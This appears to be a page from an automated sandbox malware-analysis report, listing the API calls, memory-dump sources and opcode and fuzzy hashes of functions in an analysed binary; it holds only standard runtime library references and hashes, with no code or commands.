                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                            • String ID: gfff$gfff$vector<T> too long
                                            • API String ID: 1823113695-3369487235
                                            • Opcode ID: 51df42c48983fb6291f24bbf4f5bf37269e5cf44ac4f43750597624862dd576a
                                            • Instruction ID: 56f11645b301424ffc9a8e68e20a247d1c222dab5916158cf2bdef20ef5abfa2
                                            • Opcode Fuzzy Hash: 51df42c48983fb6291f24bbf4f5bf37269e5cf44ac4f43750597624862dd576a
                                            • Instruction Fuzzy Hash: AF01AD73F140291F8310997FEE4044AEAABABC4794329CA3AE618DBB48E531D80242C3
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CEA5173
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
                                              • Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
                                              • Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113
                                            • _memmove.LIBCMT ref: 6CEA519E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                            • String ID: n/l$vector<T> too long
                                            • API String ID: 1785806476-2200402934
                                            • Opcode ID: cf23b472ba2cc00e82b1ee95f14c4aed9074e1017453043bd7b471e376c4caeb
                                            • Instruction ID: 92e2b0a84d2e90f869c279dc4579b94c1c0f18e2f9cbfacdc4010d0c31915abb
                                            • Opcode Fuzzy Hash: cf23b472ba2cc00e82b1ee95f14c4aed9074e1017453043bd7b471e376c4caeb
                                            • Instruction Fuzzy Hash: 6E0184B26016059FD728CEA8CC91C7AB3E8EB54208724492DE89AC7B40E731F805CB61
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throw
                                            • String ID:
                                            • API String ID: 2655171816-0
                                            • Opcode ID: bb36e23abefa48a25c55c2add23a1015cdda4adfcd14f561715116e8ea545435
                                            • Instruction ID: 0fb90faef0879518e593b0a8eb688ce1cb6711c2467b3124359ac2835a2ddf08
                                            • Opcode Fuzzy Hash: bb36e23abefa48a25c55c2add23a1015cdda4adfcd14f561715116e8ea545435
                                            • Instruction Fuzzy Hash: E15170757047058FD714DF68C994A1EB3F9AF98608F21492DF8A5C3B40EB34ED0A8B92
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEAD5E4
                                            • __CxxThrowException@8.LIBCMT ref: 6CEAD5F9
                                            • std::exception::exception.LIBCMT ref: 6CEAD608
                                            • __CxxThrowException@8.LIBCMT ref: 6CEAD61D
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
                                              • Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$_malloc
                                            • String ID:
                                            • API String ID: 2621100827-0
                                            • Opcode ID: a53a793bdc2a47b8650c23b4a1ca96a204c458a934ecd69867ee95156e37b15a
                                            • Instruction ID: 8235bd13bec684fcd0e6c181ffe5daa555d37020536d3b3132f5e455cc930f1e
                                            • Opcode Fuzzy Hash: a53a793bdc2a47b8650c23b4a1ca96a204c458a934ecd69867ee95156e37b15a
                                            • Instruction Fuzzy Hash: 2F514DB5A00649AFC704CFA8C980A99BBF4FB08304F60866DD4199BB41D775EA55CBA1
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEB6035
                                            • __CxxThrowException@8.LIBCMT ref: 6CEB604A
                                            • std::exception::exception.LIBCMT ref: 6CEB6059
                                            • __CxxThrowException@8.LIBCMT ref: 6CEB606E
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
                                              • Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$_malloc
                                            • String ID:
                                            • API String ID: 2621100827-0
                                            • Opcode ID: 8046240dd35049833997ce47d500b0ab9f08d8103ebd8643668ba9a20a7bf749
                                            • Instruction ID: fe7564a6d912316bd8d002a0f571063ec3dce1c7126330c6f74fb6ab390522fd
                                            • Opcode Fuzzy Hash: 8046240dd35049833997ce47d500b0ab9f08d8103ebd8643668ba9a20a7bf749
                                            • Instruction Fuzzy Hash: 44515CB1A05649AFC704CFA8C980A99FBF4FF08304F60866EE419D7B41D775E954CBA1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$Init
                                            • String ID:
                                            • API String ID: 3740757921-0
                                            • Opcode ID: 1e098109b1fc8944f34012f8cbb4915184b878268acd70d5046bcf0b40e69a37
                                            • Instruction ID: 40038627af5dba9962a21c9555b04aaa2b26de421294a368eb0d7edb8df03f1f
                                            • Opcode Fuzzy Hash: 1e098109b1fc8944f34012f8cbb4915184b878268acd70d5046bcf0b40e69a37
                                            • Instruction Fuzzy Hash: D541A93A6082019FC700DF69C840B5AB7F9FF8A724F148A6DF9449B750D731E902CBA2
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEB5E87
                                            • __CxxThrowException@8.LIBCMT ref: 6CEB5E9C
                                            • std::exception::exception.LIBCMT ref: 6CEB5EAB
                                            • __CxxThrowException@8.LIBCMT ref: 6CEB5EC0
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
                                              • Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$_malloc
                                            • String ID:
                                            • API String ID: 2621100827-0
                                            • Opcode ID: cf71a8516cff2292f9308ff2edf5c6fe7dd1995a74770ec74c7f53de38e9b49f
                                            • Instruction ID: edaa0c631cebb7f7063e89909555228a8d81fade28b1ddb33cb9460c41cff153
                                            • Opcode Fuzzy Hash: cf71a8516cff2292f9308ff2edf5c6fe7dd1995a74770ec74c7f53de38e9b49f
                                            • Instruction Fuzzy Hash: F4416EB19057489FC720CFA8C980A9AFBF4FF08304F50896EE49A97B41D775E508CBA1
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEAD437
                                            • __CxxThrowException@8.LIBCMT ref: 6CEAD44C
                                            • std::exception::exception.LIBCMT ref: 6CEAD45B
                                            • __CxxThrowException@8.LIBCMT ref: 6CEAD470
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
                                              • Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$_malloc
                                            • String ID:
                                            • API String ID: 2621100827-0
                                            • Opcode ID: 273923469ae3c4bf380e7ebe040e800dce97fbf7a28094982833a40ddfc612dc
                                            • Instruction ID: 3b724c67251ff264dcfa311da739604251d2f180f49bebc384acefd6c7e4c5cb
                                            • Opcode Fuzzy Hash: 273923469ae3c4bf380e7ebe040e800dce97fbf7a28094982833a40ddfc612dc
                                            • Instruction Fuzzy Hash: 78413CB19047489FC720CFA9D480A9AFBF4FF09304F50896ED89A97B41D775E608CBA1
                                            APIs
                                              • Part of subcall function 6CEC6480: __CxxThrowException@8.LIBCMT ref: 6CEC6518
                                              • Part of subcall function 6CEC6480: __CxxThrowException@8.LIBCMT ref: 6CEC6558
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEF2C9A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEF2CB1
                                            • std::exception::exception.LIBCMT ref: 6CEF2CC3
                                            • __CxxThrowException@8.LIBCMT ref: 6CEF2CDA
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
                                              • Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
                                              • Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$std::exception::exception$_malloc
                                            • String ID:
                                            • API String ID: 3942750879-0
                                            • Opcode ID: 35de25af2108bdbd410bf8b61ef1b6d66e82153273d94cd5c6a7959f22d49cd8
                                            • Instruction ID: 44fd28eb37f9eeec1cbdec1038bad7023acc329672f8e86a99b8e9ab6a17a7fc
                                            • Opcode Fuzzy Hash: 35de25af2108bdbd410bf8b61ef1b6d66e82153273d94cd5c6a7959f22d49cd8
                                            • Instruction Fuzzy Hash: 6C415BB15187419FC314CF58C480A9AFBF4FF99714F608A2EF1AA87B50D771A548CB92
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEBC478
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEBC488
                                            • SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6CEBC4B4
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBC512
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$DestroyElement
                                            • String ID:
                                            • API String ID: 3987547017-0
                                            • Opcode ID: cdfe992e74b4527afbf878253890594098b903e2e81b054dbf3db491b4246a44
                                            • Instruction ID: f7f4a95e7397a6b9a73dd3bd27848d72c6634ddf17f9130fefec93bed0f34509
                                            • Opcode Fuzzy Hash: cdfe992e74b4527afbf878253890594098b903e2e81b054dbf3db491b4246a44
                                            • Instruction Fuzzy Hash: 9F413171B0414AAFDB00DF98C980EEEBBB9EB49354F208569F919E7740D730AA45CB60
                                            APIs
                                            • VariantInit.OLEAUT32(6CF102A0), ref: 6CEBB5D5
                                            • VariantInit.OLEAUT32(?), ref: 6CEBB5E2
                                            • VariantClear.OLEAUT32(?), ref: 6CEBB685
                                            • VariantClear.OLEAUT32(6CF102A0), ref: 6CEBB68B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit
                                            • String ID:
                                            • API String ID: 2610073882-0
                                            • Opcode ID: 4f57af6c56a3a553275d0dc5d3496e87c70d51de4cad66f5ccb2bcd37668f305
                                            • Instruction ID: 7541918490fd811671538bb352eca909e6bc60b4c611ea88540f9cb612a59857
                                            • Opcode Fuzzy Hash: 4f57af6c56a3a553275d0dc5d3496e87c70d51de4cad66f5ccb2bcd37668f305
                                            • Instruction Fuzzy Hash: 35419372A01209DFDB10DFA9C980B9AF7F9EF89314F2441A9E914A7750D776ED01CB90
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CF088FD
                                            • __isleadbyte_l.LIBCMT ref: 6CF08930
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6CF08961
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6CF089CF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: b9b2100a4d84f71137f618b7d35c5130158eae5fbc39ca1b24c10a50e3c41146
                                            • Instruction ID: 775f71816f5675b8bcdc833149f53ebc72dec53879ec78f504915f515153e971
                                            • Opcode Fuzzy Hash: b9b2100a4d84f71137f618b7d35c5130158eae5fbc39ca1b24c10a50e3c41146
                                            • Instruction Fuzzy Hash: DE31F831B05386EFDB00DFA8C8A4AAE3FF4BF01B14F25456AE4A49B691D330D940EB51
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CE95ACB
                                            • __CxxThrowException@8.LIBCMT ref: 6CE95AE0
                                            • std::exception::exception.LIBCMT ref: 6CE95B18
                                            • __CxxThrowException@8.LIBCMT ref: 6CE95B2D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception$_malloc
                                            • String ID:
                                            • API String ID: 3153320871-0
                                            • Opcode ID: 4041dceba797dc1611699ef8aa9caa1d257bead603b3abc15b7226ad305d971e
                                            • Instruction ID: c5a0351d85180a620dca78bd32bbcb308971e6e953965bfcfa159ab99e3c890a
                                            • Opcode Fuzzy Hash: 4041dceba797dc1611699ef8aa9caa1d257bead603b3abc15b7226ad305d971e
                                            • Instruction Fuzzy Hash: 8131B8B2914608ABC710CF94D8419DAF7F8FF48754F10C66EE85997B40EB70AA04CBE1
                                            APIs
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • InitializeCriticalSection.KERNEL32(00000000,00000000,6CEA5D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6CEA84EA
                                            • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6CEA84F0
                                            • std::exception::exception.LIBCMT ref: 6CEA853C
                                            • __CxxThrowException@8.LIBCMT ref: 6CEA8551
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
